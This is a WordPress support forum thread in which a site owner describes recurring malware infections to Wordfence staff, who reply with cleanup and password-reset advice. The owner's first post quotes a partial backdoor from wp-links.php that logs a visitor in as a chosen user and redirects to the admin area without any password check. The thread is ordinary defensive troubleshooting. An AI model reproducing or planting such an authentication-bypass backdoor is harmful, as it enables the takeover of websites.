Title: Request for Support – WordPress Malware Issue
Last modified: June 13, 2023
---
# Request for Support – WordPress Malware Issue
* Resolved [Helani De SIlva](https://wordpress.org/support/users/helani/)
* (@helani)
* [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/)
* Dear Wordfence Support Team,
* I am reaching out to seek assistance with a malware issue on my WordPress website.
I have been experiencing recurring malware injections, and despite my efforts,
I have been unable to completely resolve the issue.
* Description of the malware issue:
- Malicious files: wp-links.php, sw.js, font.js, index.php, google.json
- File locations:
* wp-links.php found in the root directory, and occasionally in public_html/
wp-includes
* Additional files in the wp-content folder: index.php and google.json
* Presence of these malicious files in wp-includes/theme folder and plugin
folders as well
- Code injection: The malware injects a script into the theme’s header.php file
with the following content:
- Other affected files: There are additional PHP files that I have been unable
to locate.
- Malware detection: When Googling the issue, it shows the reason as SMW-INJ-
21631-php.tool.obf.remote-0.
* Files in the plugin folders affected by malware:
- public_html/wp-content/plugins/google-site-kit/google-site-kit.php
- public_html/wp-content/plugins/pixwell-deal/pixwell-deal.php
- public_html/wp-content/plugins/elementor/elementor.php
- public_html/wp-content/plugins/envato-market/envato-market.php
- public_html/wp-content/plugins/pixwell-core/pixwell-core.php
* Code snippet from wp-links.php file:
* ```wp-block-code
user_login;
$user = get_user_by('login', $username );
if ( !is_wp_error( $user ) )
{
wp_clear_auth_cookie();
wp_set_current_user ( $user->ID );
wp_set_auth_cookie ( $user->ID );
$redirect_to = user_admin_url();
wp_safe_redirect( $redirect_to );
exit();
}
}
```
* Steps I have taken so far:
1. Scanned my website using a security plugin, but the malware continues to reappear.
2. Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin
files manually from the respective directories.
3. Checked theme files for suspicious code and removed any identified malicious
snippets.
4. Updated WordPress, themes, and plugins to their latest versions.
5. Changed all passwords related to my website, including admin, FTP, and database.
* Despite these efforts, the malware keeps reappearing, and I’m unable to find
the source of the infection. I would greatly appreciate your assistance in identifying
and resolving the issue permanently.
* Please let me know if there are any additional steps I can take or if you require
any further information to assist me with this matter. Thank you for your time
and support.
* Sincerely,
Helani
* The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Frequest-for-support-wordpress-malware-issue%2F%3Foutput_format%3Dmd&locale=en_US)
to see the link]_
Viewing 3 replies - 1 through 3 (of 3 total)
* Plugin Support [wfpeter](https://wordpress.org/support/users/wfpeter/)
* (@wfpeter)
* [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/#post-16814720)
* Hi [@helani](https://wordpress.org/support/users/helani/), I’m sorry to see you’ve
been having recurring issues like this.
* If you haven’t already, carefully follow the checklist we provide for site admins
to try their own cleaning sites: [https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/)
* I’ll always be sure to encourage you to update all plugins and themes along with
running the latest WordPress core if you haven’t already. WordPress sometimes
patches their older releases if they find a vulnerability so make sure to update
your version if needed. We, of course, recommend that you update to the latest
version.
* **As a rule, any time I think someone’s site has been compromised I also tell
them to update their passwords for their hosting control panel, FTP, WordPress
admin users, and database. Make sure to do this.**
* Additionally you might find the WordPress Malware Removal section in [our free Learning Center](https://wordfence.com/learn/)
helpful if you haven’t explored it already.
* In terms of the particular files and code snippets you’ve shown here, if the
above documentation doesn’t fully help, our threat intelligence team can assist.
Providing files you’ve found to **samples @ wordfence . com** can assist you
and other customers if Wordfence isn’t currently picking up a threat. Often,
we will have rules already but the code may be obfuscated in a way the plugin
hasn’t seen before.
* **Remember to obscure/remove any passwords or keys/salts in any files you do
send to us.**
* If you are unable to clean this on your own there are paid services that will
do it for you. Wordfence offers one and there are others. Regardless of whether
you choose to clean it yourself or let someone else do it – we recommend that
you make a **full backup** of the site beforehand.
* Thanks,
Peter.
* Thread Starter [Helani De SIlva](https://wordpress.org/support/users/helani/)
* (@helani)
* [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/#post-16817357)
* Hello,
* Thank you for your reply. I want to correct previous forum ,
- Malware detection: When **Googling** the issue, it shows the reason as **SMW-
INJ-21631-php.tool.obf.remote-0**.
* Files in the plugin folders affected by malware:
- public_html/wp-content/plugins/google-site-kit/google-site-kit.php
- public_html/wp-content/plugins/pixwell-deal/pixwell-deal.php
- public_html/wp-content/plugins/elementor/elementor.php
- public_html/wp-content/plugins/envato-market/envato-market.php
- public_html/wp-content/plugins/pixwell-core/pixwell-core.php
* like this. But it’s not fully correct.
- Malware detection: When using **ImunifyAV** the issue, it shows the reason
as **SMW-INJ-21631-php.tool.obf.remote-0**.
* Files in the plugin folders affected by malware:
- public_html/wp-content/plugins/google-site-kit/google-site-kit.php
- public_html/wp-content/plugins/pixwell-deal/pixwell-deal.php
- public_html/wp-content/plugins/elementor/elementor.php
- public_html/wp-content/plugins/envato-market/envato-market.php
- public_html/wp-content/plugins/pixwell-core/pixwell-core.php
* And I like to get help from you to solve this issue. I alrady mail to you before
submit this forum here. Anyway I mail to you again.
* Thank you,
* Helani
* Thread Starter [Helani De SIlva](https://wordpress.org/support/users/helani/)
* (@helani)
* [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/#post-16826358)
* Hello,
* I already got the Wordfence Care, but you still can’t give the permanent solution
for me.
* I only need **permanent** solution.
* Thank you,
* Helani
Viewing 3 replies - 1 through 3 (of 3 total)
The topic ‘Request for Support – WordPress Malware Issue’ is closed to new replies.
* 
* [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/)
* [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq)
* [Support Threads](https://wordpress.org/support/plugin/wordfence/)
* [Active Topics](https://wordpress.org/support/plugin/wordfence/active/)
* [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/)
* [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/)
* 5 replies
* 8 participants
* Last reply from: [Helani De SIlva](https://wordpress.org/support/users/helani/)
* Last activity: [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/#post-16826358)
* Status: resolved